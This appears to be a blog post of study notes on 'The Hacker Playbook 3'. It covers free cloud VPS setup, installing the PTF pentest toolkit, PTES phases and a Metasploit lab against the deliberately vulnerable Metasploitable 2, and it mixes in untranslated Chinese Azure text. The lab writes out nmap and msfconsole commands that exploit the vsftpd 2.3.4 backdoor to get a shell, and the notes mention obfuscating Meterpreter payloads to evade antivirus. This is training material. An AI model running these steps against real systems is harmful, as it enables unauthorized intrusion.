THE HACKER PLAYBOOK 3: Practical Guide to Penetration Testing, Red Team Edition
THE HACKER PLAYBOOK 3
Practical Guide to Penetration Testing
Red Team Edition
Peter Kim
Practical Guide to Penetration Testing
Red Team Edition
Peter Kim
1 pregame - the setup
Setting Up Your Campaign
Setting Up Your External Servers
- Lightsail is free only for 3 months.
- For permanently free VPS, Oracle Cloud offers the best resources.
- Other good options include GCP, AWS EC2 free tier, and Azure.
Step-by-Step: Set Up Free Ubuntu VPS on Oracle Cloud
Step 1: Create an Oracle Cloud Account
- Go to: https://www.oracle.com/cloud/free/
- Click "Start for Free"
- Fill in your:
- Name, email, password
- Country/region
- Credit card (required for identity verification, but you won’t be charged)
- Confirm your email and phone number
Step-by-Step: Set Up Free Ubuntu VPS on Microsoft Azure
Step 1: Create an Azure Cloud Account
- Go to: https://azure.microsoft.com/free
- Click "Start free" 使用 Azure 入口網站中的[免費服務] 頁面來建立免費服務
- Sign in with a Microsoft account or create one
- Enter:
- Personal details
- Credit card (for verification only)
- Phone number
如果您在 [免費服務] 頁面以外的地方建立資源,預設情況下不會總是選取免費層或免費資源組態選項。
若要避免產生費用,請確定您從 [免費服務] 頁面建立資源。
然後,當您建立資源時,請務必選取免費層。
Step 2: Create Ubuntu VM (Free Tier)
您可以透過 Azure 入口網站建立 Azure 虛擬機器 (VM)。 Azure 入口網站是以瀏覽器為基礎的使用者介面,可用來建立 Azure 資源。為了查看作用中的 VM,您還會以 SSH 連線至 VM,並安裝 NGINX 網頁伺服器。
- After sign-in, go to Azure Portal: https://portal.azure.com
- On the sidebar, click "Virtual Machines" → Create → Azure virtual machine
- Configure: Project details:
- Subscription: Select your free tier subscription
- Resource group: Create a new one (e.g., my-free-tier)
- VM name: e.g., ubuntu-vps
- Region: Choose one that allows B1S VM (e.g., East US)
- Image: Choose Ubuntu Server 22.04 LTS
- Size: Click "See all sizes", filter by “Free services”, and pick B1S
- Authentication type:
- Choose SSH public key
- Username: azureuser
- Leave disk, networking, and monitoring as defaults (or adjust as needed)
- Click Review + Create, then Create
- Download myKey.pem
Step 3: Connect to the VM
部署完成之後,請選取 [前往資源]。 Once the VM is deployed:- Go to the VM overview page Select VM "ubuntu-vps" you created from the Resource list.
- Copy the public IP from the page VM 的頁面上,選取公用 IP 位址,並將其複製到剪貼簿。
- Connect using:
ssh -i ~/Downloads/myKey.pem azureuser@your_public_ipThe default user is usually azureuser, but double-check in the "Essentials" section.
Optional: Open Ports (Firewall)
- Go to the VM's Networking tab
- Add inbound port rules for:
- HTTP (port 80)
- HTTPS (port 443)
- Custom ports if needed (e.g., 8080, 22)
Install Web server
從 SSH 工作階段更新套件來源,然後安裝最新的 NGINX 套件。sudo apt-get -y update sudo apt-get -y install nginxTest using Web browser to acess the public IP of the VM
PENTESTERS FRAMEWORK (PTF)
PTF is a Python script to keep your penetration testing toolkit up-to-date.
PTF installs all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used.
PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit.
To download PenTesters Framework (PTF),
git clone https://github.com/trustedsec/ptf/The config/ptf.config file which contains the base location of where to install everything. By default this will install in the /pentest directory.
Installation
sudo apt install python3-pip pip install -r requirements.txt sudo ./ptfThis will put you in a Metasploitesque type shell which has a similar look and feel.
- Update EVERYTHING! This will install all of the tools inside of PTF.
ptf> use modules/update_installedYou can also individually install each module, then use the use modules/update_installed which will only update what you've previously installed.
ptf> use modules/update_installed
Install only for exploitation tools
ptf> use modules/exploitation/install_update_all
modules/exploitation/metasploit modules/vulnerability-analysis/nmap modules/post-exploitation/unicornModify the list.txt file and add the tools you only want to install or update.
ptf> use modules/custom_list/list [*] You are about to install/update everything. Proceed? [yes/no]: .. [*] All finished installing/and or updating.. All shiny again. ptf>You can also simply specify a module without using the category:
ptf> use modules/intelligence-gathering/theHarvester
ptf:(modules/intelligence-gathering/theHarvester)>show options
Module Author: Mauro Risonho de Paula Assumpcao (firebits)
Module Description: This module will install/update theHarvester - E-mails, subdomains and names Harvester - OSINT
-------------------------------------------------------------------------------------
INSTALL_TYPE: GIT
REPOSITORY_LOCATION: https://github.com/laramies/theHarvester.git
INSTALL_LOCATION: /pentest/intelligence-gathering/theharvester/
-------------------------------------------------------------------------------------
ptf:(modules/intelligence-gathering/theHarvester)> install
..
[*] Created automatic launcher, you can run the tool from anywhere by typing: theHarvester
ptf:(modules/intelligence-gathering/theHarvester)>back
ptf>
Modules
List modules you can installptf> show modulesUnder modules/ directory, there are sub directories based on the Penetration Testing Execution Standard (PTES) phases.
ptf/modules$ tree -L 1 . |-- __init__.py |-- av-bypass |-- code-audit |-- custom_list |-- exploitation |-- install_update_all.py |-- intelligence-gathering |-- mobile-analysis |-- osx |-- password-recovery |-- pivoting |-- post-exploitation |-- powershell |-- pre-engagement |-- reporting |-- reversing |-- threat-modeling |-- update_installed.py |-- vulnerability-analysis |-- webshells |-- windows-tools `-- wirelessThe PTES is a framework that defines a structured approach to penetration testing.
It outlines best practices, methodologies, and a common language for conducting thorough and repeatable security assessments. PTES consists of 7 phases:
- Pre-engagement Interactions Define scope and rules
- Intelligence Gathering Collect information
- Threat Modeling Identify potential attack paths
- Vulnerability Analysis Find and assess weaknesses
- Exploitation Attempt attacks to verify vulnerabilities
- Post-Exploitation Analyze impact and maintain access
- Reporting Share findings and suggest fixes
As soon as you add a new one, for example testing.py, it will automatically be imported next time you launch PTF.
There are a few key components when looking at a module that must be completed.
Below is a sample module:
AUTHOR="David Kennedy (ReL1K)"
DESCRIPTION="This module will install/update the Browser Exploitation Framework (BeEF)"
INSTALL_TYPE="GIT"
REPOSITORY_LOCATION="https://github.com/beefproject/beef"
X64_LOCATION="https://github.com/something_thats_x64_instead_of_x86
INSTALL_LOCATION="beef"
DEBIAN="ruby1.9.3,sqlite3,ruby-sqlite3"
ARCHLINUX = "arch-module,etc"
BYPASS_UPDATE="NO"
AFTER_COMMANDS="cd {INSTALL_LOCATION},ruby install-beef"
LAUNCHER="beef"
TOOL_DEPEND="modules/exploitation/metasploit"
Tools of the Trade
| Type | Focus | Attitude |
|---|---|---|
| Red Team | Realistic attack simulation | Adversarial |
| Blue Team | Defense, monitoring, response | Defensive |
| Purple Team | Red + Blue collaboration | Cooperative |
| Penetration Test | Known-scope vulnerability discovery | Adversarial but scoped tightly |
| Term | Meaning | Example |
|---|---|---|
| Vulnerability | A flaw or weakness | MS17-010 SMB bug |
| Exploit | Code that abuses a vulnerability | EternalBlue |
| Payload | Malicious code delivered after exploitation | Meterpreter shell |
| Exploitation | The act of using the exploit | Running EternalBlue to get access |
| Patch | Fix for a vulnerability | Windows update that closes SMB flaw |
| CVE | Public ID for a vulnerability | CVE-2017-0144 |
| PoC | Demo of an exploit | GitHub code showing buffer overflow |
Metasploit Framework
Metasploit is a powerful open-source framework used by security professionals (and attackers) to develop, test, and execute exploits. It’s like a toolkit for hacking into systems ethically.
We might use a known Windows vulnerability (EternalBlue) to break into computers on the target network.
This exploit targets Windows file-sharing (SMBv1) and lets an attacker gain remote access to vulnerable systems without needing login credentials.
Obfuscating(混淆的) Meterpreter Payloads
Obfuscating Meterpreter Payloads means hiding or disguising the malicious code (payload) generated by Metasploit so that it is harder for antivirus (AV) to detect or block it.Metasploit Unleashed - Free Online Ethical Hacking Course
Teach you how to use Metasploit, in a structured and intuitive manner.
Introduction
Overview
The Metasploit Framework (MSF) is far more than just a collection of exploits.Requirements
We highly recommend using a system that is capable of running multiple virtual machines to host your labs.Before jumping in to the Metasploit Framework, we will need to have both an attacking machine (Kali Linux) and a victim machine (metasploitable 2) as well as a hypervisor to run both in a safe and secluded network environment.
- Hypervisor Our recommended hypervisor for the best out-of-the-box compatibility with Kali and metasploitable is VMware Player.
- Kali Linux Kali Linux comes with Metasploit pre-installed along with numerous other security tools that you can try out against your victim machine.
7z x kali-linux-2025.2-virtualbox-amd64.7z
Launch VirtualBox:
virtualbox
In "Tools", select ‘Add’.We then navigate to the location where our VM is downloaded and find the .vbox file.
We can verify the settings that will be set here, and if we need to change any we can. Once we are happy we can select boot the VM and use it as normal. Remember the default login is kali for the user and kali for the password!
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.
You can download the image file of Metasploitable 2 from SourceForge.
This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable’s network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network.
Once you have downloaded the Metasploitable VM, extract the zip file,
- Virtualbox In "Tools", select ‘New’
- VMware pen up the .vmx file using your VMware product of choice
Now choose the option to use an existing virtual hard disk file. Click the folder icon, then browse and select the .vmdk file extracted from the Metasploitable 2 ZIP archive. This will mount the VM's hard drive directly, no ISO needed.
Create the instance.
After a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.
Check the running services:
netstat -tuln
Demo of penetration testing with Metasploitable 2
- open your both machines Metasploitable 2 and kali Linux side by side.
- let's check the IP addresses of both machines to get an overview of the target machine. Get the IP of the target (Metatspolitable).
- Perform a network scan with the help of the Nmap tool to see what services are running on target and which are way into the target
- -sV Get the versions of services running on the target machine
- -O Detect the operating system on the target machine.
- Use the vsftpd_234_backdoor exploit, for exploitation and gaining access to the machine.
- start the Metasploit Framework
- deploy the exploit into the target machine select the exploit that we are going to use
- set up the target to which we are deploying the exploit.
- run the exploit
$ nmap -sV -O 192.168.10.5
$ msfconsole
msf6~/ use exploit/unix/ftp/vsftpd_234_backdoor
msf6~/ (unix/ftp/vsftpd_234_backdoor): show options
msf6~/ (unix/ftp/vsftpd_234_backdoor): set RHOST 192.168.0.104
msf6~/ (unix/ftp/vsftpd_234_backdoor): exploit
You will see the command shell of the target machine is obtained.
Metasploit Architecture
Metasploit is written in Ruby
- Filesystem And Libraries In Kali Linux, Metasploit is provided in the metasploit-framework package and is installed in the /usr/share/metasploit-framework directory:
- data The data directory contains editable files used by Metasploit to store binaries required for certain exploits, wordlists, images, and more.
- documentation
- lib the framework code base.
- modules the actual MSF modules for exploits, auxiliary and post modules, payloads, encoders, and nop generators.
- plugins
- scripts
- tools useful command-line utilities.
- Metasploit Libraries There are a number of MSF libraries that allow us to run our exploits without having to write additional code for rudimentary tasks, such as HTTP requests or encoding of payloads.
- Rex The basic library for most tasks
- Msf::Core
- Msf::Base
- Modules and Locations
- Metasploit Object Model
- Mixins and Plugins
Handles sockets, protocols, text transformations, and others
SSL, SMB, HTTP, XOR, Base64, Unicode
Metasploit Fundamentals
Information Gathering
Vulnerability Scanning
Writing a Simple Fuzzer
Exploit Development
Web App Exploit Dev
Client Side Attacks
MSF Post Exploitation
Meterpreter Scripting
Maintaining Access
MSF Extended Usage
Metasploit GUIs
Post Module Reference
Auxiliary Module Reference
TryHackMe – Beginner Friendly, Hands-On: Cyber Security Learning Roadmap
Conclusion
All of your tools and servers are configured.
留言